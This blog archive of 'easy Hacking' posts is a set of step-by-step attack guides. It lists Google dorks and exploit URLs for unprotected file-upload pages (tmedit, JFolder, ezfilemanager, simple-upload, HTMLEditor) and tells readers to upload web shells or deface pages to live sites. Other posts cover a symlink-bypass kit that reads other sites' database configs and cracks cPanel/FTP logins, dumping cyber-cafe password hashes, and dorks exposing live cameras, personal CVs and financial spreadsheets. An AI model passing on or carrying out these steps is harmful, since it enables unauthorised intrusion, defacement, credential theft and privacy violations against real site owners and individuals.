Showing posts with label easy Hacking. Show all posts
Showing posts with label easy Hacking. Show all posts



Dork: inurl:/editor/tmedit/popups
Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php

#start :)

open Google.com or Bing.com and type this dork inurl:/editor/tmedit/popups

i got 9740 vulnrable results, now select any site from seacrh result and look for upload option on that Page now upload you shell, deface page, or anyfile there,

After uploading your file you'll see your uploaded file's url there, if you are not getting any perview url then goto /images directory to view your uploaded file

for example : http://vulnrablesite.com/images/yourfilehere

Labels: , , , , , ,

Dork : www.topronet.com ,All Rights Reserved.Any question, please email me cqq1978@Gmail.com

and 

JFoler 1.0 A jsp based web folder management tool by Steven Cee

(its not a Particular dork, please try to modify it and if you sucessfull modified then leave new dork in comment)

Just select any site from search results and now upload your deface page or shell

shell upload : for shell uploading rename your asp shell (shell.asp) to shell.jsp then upload it, you can try .php too, every Extension is allowed but in some sites you can't excute php and asp shell

Path : depends on website






Labels: , , , , ,



Get access to all the readable directories on the server and their possible database.
Steps to get access.
Go to your shell
Upload this zip file "Jumping.zip"
Download it from here
After that just unzip our zip file by giving the following command
unzip jumping.zip
Once it done and unzip command is executed you will see like this
This show all the files included in our zip file
 Now go and open our jumping folder. if you have uploaded it in public_html 
then the link would be www.site.com/jumping and you would see the below image


 Now open barc0de mini.php its an shell. once you open it. it look like this





Enter pass hackers
Now open jump.php it will take some time to load as it scans for all readable sites on server.

Once it done it will come up will all readable sites on server like this


 All the above are directly readable. Now will run scanner.php

it will read for config file in those dir once done it shows us like this
Now lets take one of them and put it in our barc0de mini.php and see if it shows us the database
And boom we have the access to its database config
i have included two more files sql.php & domain.php. this will help you to get website name and get in to database..cracker.php tries to crack ftp+ cpanel...
Updated barc0de.php
This shell is the newer version of barc0de mini.php
it is all in one shell. it has jump, scanner, cracker, and checker included in one shell
Download it from here barc0de.php 

Labels: , , , , , , , ,





1. As you all must have know these days all Cyber cafe owners have a program for administration to control all PC’s in local area network. So all files can be inter transmitted.

2. First of all press Ctrl+Alt+Del the task manager or any controlling application, will open. Then from APPLICATIONS select the program that is controlling all PC’s & terminate it, This is for security reason. Now log of PC, & you ll get user names of the PC.

3. But some times, cyber cafes have security clients installed that have restricted access to Task Manager

, restart the computer & press F8 continuously before windows boots.

The Menu will open, select Safe Mode from it. And now you can copy files from networked PC’s without any security layer.

Next step is where you’ll need to crack the hashes. SO go to your home PC , Download & install Saminside cracking tool. And from some another Cyber cafe try to crack the hashes of that PC. By same log off method explained below.

This where you actually perform hacking. Have a gret time & tell us weather it worked for you.

Meanwhile if you can get IP address, of the PC you wish to hack try to get it from ip-explorer.com, but this is not the part of this hack its sort of next step of hacking from outside the network.

Labels: , , , , ,



Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.







1. Hacking Security Cameras :



There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter



inurl:”viewerframe?mode=motion”


Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls.



Its as if your computer is a remote control and no one can track you down!! Well for me i got into a zoo’s webcam and i could see a lady feeding the Giraffe



Using this trick you can see live stuff with a fast internet connection including Baseball matches and soccer matches by adding a few more keywords in the line



You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.



intitle:”Live View / – AXIS”


Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.



2. Hacking Personal and Confidential Documents



Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.



intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”


You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.



filetype:xls inurl:”email.xls”



Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query



intitle:index.of finances.xls


3. Hacking Google to gain access to Free Stuffs



Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.



“?intitle:index.of?mp3 eminem“


Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3? with “pdf” or “zip” or “rar”.



Note: This Information is for educational purposes only Ashtricks and its owner is not responsible for anything done by you

Labels: , , , , , ,

Being a hacker its Important to know the most of the methods which are require to hacking. Well my last post was E-mail related. Today I will tell you Advanced way to hack a website by using symlink bypassing. Now what is symlink bypassing ?

Symlink Bypassing:



Symlink is a method to reference other files and folder on Linux, in order to make linux work faster.  Symlink Bypassing is a hacking technique used to gain unauthorized access to folders on a server. Using this technique an hackers are able to hack multiple sites on a shared web hosting service.



Now lets get started

 


Require Tools
Symlink Files – Click here to download




Labels: , , , , , , , ,

Google Dork inurl:ezfilemanager/ezfilemanager.php

(Modify this dork for getting mor results from Google =)



Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file


Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and 
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file


Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files


Labels: , , , , ,

Go to Google.com and enter dork ~ 

"inurl:simple-upload-53.php" 



see search results and select any website 





the exploit url will be link this 





http://www.site.com/simple-upload-53.php





Now Upolad Your shell here as .php.jpg .php.girf etc 

and you can upload your deface in image Type





to view you uploaded file just goto http://www.site.com/files/yourfilehere

Labels: , , , , ,



Google Dork : inurl:/HTMLEditor/editor/ 

or "inurl:/HTMLEditor/editor//filemanager/"

or "inurl:/HTMLEditor/editor//filemanager//connectors/"





Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html

or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html





Go here :



http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html


or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

 chnage connectors into PhP (Like FCKeditor) and upload Your file





suppoted files : .TXT and .JPG in some site you can upload .html and .php too





to view you file goto : http://website/PowerCMS%20folder/files/your file here

or http://website/patch//PowerCMS%20folder/files/your file here 


Examples :

Labels: , , , , , ,